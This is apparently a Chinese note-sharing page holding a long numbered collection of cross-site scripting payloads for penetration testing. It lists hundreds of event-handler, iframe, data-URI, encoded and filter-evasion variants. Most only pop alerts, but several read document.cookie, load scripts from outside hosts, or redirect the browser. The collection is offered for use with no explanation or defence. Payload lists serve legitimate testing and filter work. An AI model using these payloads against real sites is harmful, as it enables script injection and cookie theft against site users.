[关闭]
@1kbfree 2018-07-22T18:52:19.000000Z 字数 152488 阅读 1959

Xss-payload集合~

渗透


Code

  1. <details open ontoggle=eval("javascript:alert('xss')")
  1. <a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>123</a>
  2. 解密后:
  3. <svg/onload=alert(1)>

大全

  1. onmouseenter=prompt(document.domain)
  2. <x:script xmlns:x="https://sql--injection.blogspot.co.uk">alert('xss');</x:script>
  3. <isindex type=image src=1 onerror=alert(1)>
  4. <isindex action=javascript:alert(1) type=image>
  5. <img src=x:alert(alt) onerror=eval(src) alt=0>
  6. <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116&grave;1&grave;> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script><script>alert(String.fromCharCode(88,83,83))</script> <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
  7. <b/alt="1"onmouseover=InputBox+1language=vbs>test</b>
  8. </a onmousemove="alert(1)">
  9. <script+&injection=>alert(1)></script>
  10. <img src="x:ö" title="onerror=alert(1)//">
  11. <img src="x:? title=" onerror=alert(1)//">
  12. <img src="x:gif" onerror="alert(0)">
  13. <img src="x:alert" onerror="eval(src%2b'(0)')">
  14. <img src="x:gif" onerror="eval('al'%2b'lert(0)')">
  15. <img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
  16. <b "<script>alert(1)</script>">hola</b>
  17. <a href=“?xss=<script>”>link</a>
  18. <img src=“http://victim/newUser?name=<script>alert(1)</script>”/>
  19. %C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
  20. <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
  21. <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
  22. <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  23. <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
  24. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  25. <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
  26. <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
  27. <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
  28. <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
  29. <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
  30. <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
  31. <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
  32. <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
  33. <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
  34. <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
  35. <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
  36. <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
  37. <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
  38. <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
  39. <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
  40. <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
  41. <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
  42. <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
  43. <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
  44. <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
  45. <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
  46. <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
  47. <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
  48. <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
  49. <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
  50. <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
  51. <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
  52. <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
  53. <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
  54. <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
  55. <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
  56. <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
  57. <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
  58. <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
  59. <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
  60. <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
  61. <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
  62. <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
  63. <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
  64. <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
  65. <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
  66. <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
  67. <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
  68. <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
  69. <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
  70. <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
  71. <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
  72. <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
  73. <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  74. <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
  75. <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
  76. <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
  77. <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
  78. <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
  79. <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
  80. <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
  81. <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
  82. <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
  83. <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
  84. <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
  85. <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
  86. <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
  87. <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
  88. <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
  89. <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
  90. <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
  91. <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
  92. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  93. <INPUT TYPE="BUTTON" action="alert('XSS')"/>
  94. "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
  95. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  96. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  97. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  98. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  99. "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
  100. "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  101. "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
  102. ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
  103. g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
  104. <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
  105. "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
  106. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  107. <iframe src=http://xss.rocks/scriptlet.html <
  108. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  109. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  110. <iframe src="&Tab;javascript:prompt(1)&Tab;">
  111. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  112. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  113. <sVg><scRipt >alert&lpar;1&rpar; {Opera}
  114. <img/src=`` onerror=this.onerror=confirm(1)
  115. <form><isindex formaction="javascript&colon;confirm(1)"
  116. <img src=``&NewLine; onerror=alert(1)&NewLine;
  117. <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
  118. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  119. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  120. <script /**/>/**/alert(1)/**/</script /**/
  121. &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
  122. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  123. <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  124. <svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script
  125. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  126. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  127. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  128. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
  129. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  130. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  131. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
  132. http://www.google<script .com>alert(document.location)</script
  133. <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  134. <img/src=@&#32;&#13; onerror = prompt('&#49;')
  135. <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  136. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  137. </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  138. &#00;</form><input type&#61;"date" onfocus="alert(1)">
  139. <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  140. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  141. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  142. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  143. <script ~~~>alert(0%0)</script ~~~>
  144. <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  145. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  146. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
  147. &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
  148. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
  149. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  150. <div/style="width:expression(confirm(1))">X</div> {IE7}
  151. <iframe// src=javaSCRIPT&colon;alert(1)
  152. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
  153. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  154. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  155. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  156. <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  157. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  158. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
  159. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  160. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  161. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  162. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  163. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  164. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  165. <var onmouseover="prompt(1)">On Mouse Over</var>
  166. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  167. <img src="/" =_=" title="onerror='prompt(1)'">
  168. <%<!--'%><script>alert(1);</script -->
  169. <script src="data:text/javascript,alert(1)"></script>
  170. <iframe/src \/\/onload = prompt(1)
  171. <iframe/onreadystatechange=alert(1)
  172. <svg/onload=alert(1)
  173. <input value=<><iframe/src=javascript:confirm(1)
  174. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  175. http://www.<script>alert(1)</script .com
  176. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  177. <svg><script ?>alert(1)
  178. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  179. <img src=`xx:xx`onerror=alert(1)>
  180. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  181. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  182. <math><a xlink:href="//jsfiddle.net/t846h/">click
  183. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  184. <svg contentScriptType=text/vbs><script>MsgBox+1
  185. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  186. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  187. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  188. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  189. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  190. <object data="javascript:alert(0)">
  191. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  192. <script>+-+-1-+-+alert(1)</script>
  193. <body/onload=&lt;!--&gt;&#10alert(1)>
  194. <script itworksinallbrowsers>/*<script* */alert(1)</script
  195. <img src ?itworksonchrome?\/onerror = alert(1)
  196. <svg><script>//&NewLine;confirm(1);</script </svg>
  197. <svg><script onlypossibleinopera:-)> alert(1)
  198. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  199. <script x> alert(1) </script 1=2
  200. <div/onmouseover='alert(1)'> style="x:">
  201. <--`<img/src=` onerror=alert(1)> --!>
  202. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  203. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  204. "><img src=x onerror=window.open('https://www.google.com/');>
  205. <form><button formaction=javascript&colon;alert(1)>CLICKME
  206. <math><a xlink:href="//jsfiddle.net/t846h/">click
  207. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  208. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  209. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  210. <script\x20type="text/javascript">javascript:alert(1);</script>
  211. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  212. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  213. <script\x09type="text/javascript">javascript:alert(1);</script>
  214. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  215. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  216. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  217. '`"><\x3Cscript>javascript:alert(1)</script>
  218. '`"><\x00script>javascript:alert(1)</script>
  219. <img src=1 href=1 onerror="javascript:alert(1)"></img>
  220. <audio src=1 href=1 onerror="javascript:alert(1)"></audio>
  221. <video src=1 href=1 onerror="javascript:alert(1)"></video>
  222. <body src=1 href=1 onerror="javascript:alert(1)"></body>
  223. <image src=1 href=1 onerror="javascript:alert(1)"></image>
  224. <object src=1 href=1 onerror="javascript:alert(1)"></object>
  225. <script src=1 href=1 onerror="javascript:alert(1)"></script>
  226. <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
  227. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
  228. <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
  229. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
  230. <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
  231. <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
  232. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
  233. <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
  234. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
  235. <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
  236. <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
  237. <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
  238. <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
  239. <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
  240. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
  241. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
  242. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
  243. <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
  244. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
  245. <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
  246. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
  247. <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
  248. <applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
  249. <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
  250. <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
  251. <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
  252. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
  253. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
  254. <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
  255. <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
  256. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
  257. <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
  258. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
  259. <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
  260. <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
  261. <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
  262. <body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
  263. <object onError object onError="javascript:javascript:alert(1)"></object onError>
  264. <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
  265. <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
  266. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
  267. <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
  268. <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
  269. <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
  270. <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
  271. <body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
  272. <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
  273. <body onload body onload="javascript:javascript:alert(1)"></body onload>
  274. <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
  275. <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
  276. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
  277. <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
  278. <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
  279. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
  280. <iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
  281. <svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
  282. <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
  283. <body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
  284. \x3Cscript>javascript:alert(1)</script>
  285. '"`><script>/* *\x2Fjavascript:alert(1)// */</script>
  286. <script>javascript:alert(1)</script\x0D
  287. <script>javascript:alert(1)</script\x0A
  288. <script>javascript:alert(1)</script\x0B
  289. <script charset="\x22>javascript:alert(1)</script>
  290. <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
  291. --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
  292. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
  293. --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
  294. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
  295. `"'><img src='#\x27 onerror=javascript:alert(1)>
  296. <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
  297. "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
  298. <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
  299. <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
  300. <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
  301. <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
  302. <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
  303. <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
  304. <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
  305. <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
  306. <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
  307. <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
  308. <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
  309. <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
  310. <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
  311. <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
  312. <script>/* *\x2A/javascript:alert(1)// */</script>
  313. <script>/* *\x00/javascript:alert(1)// */</script>
  314. <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
  315. <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
  316. <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
  317. <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
  318. <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
  319. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
  320. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
  321. <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
  322. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
  323. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
  324. '`"><\x3Cscript>javascript:alert(1)</script>
  325. '`"><\x00script>javascript:alert(1)</script>
  326. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
  327. "'`><\x00img src=xxx:x onerror=javascript:alert(1)>
  328. <script src="data:text/plain\x2Cjavascript:alert(1)"></script>
  329. <script src="data:\xD4\x8F,javascript:alert(1)"></script>
  330. <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
  331. <script src="data:\xCB\x8F,javascript:alert(1)"></script>
  332. <script\x20type="text/javascript">javascript:alert(1);</script>
  333. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  334. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  335. <script\x09type="text/javascript">javascript:alert(1);</script>
  336. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  337. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  338. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  339. ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
  340. ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
  341. ABC<div style="x:expression\x00(javascript:alert(1)">DEF
  342. ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
  343. ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
  344. ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
  345. ABC<div style="x:\x09expression(javascript:alert(1)">DEF
  346. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
  347. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
  348. ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
  349. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
  350. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
  351. ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
  352. ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
  353. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
  354. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
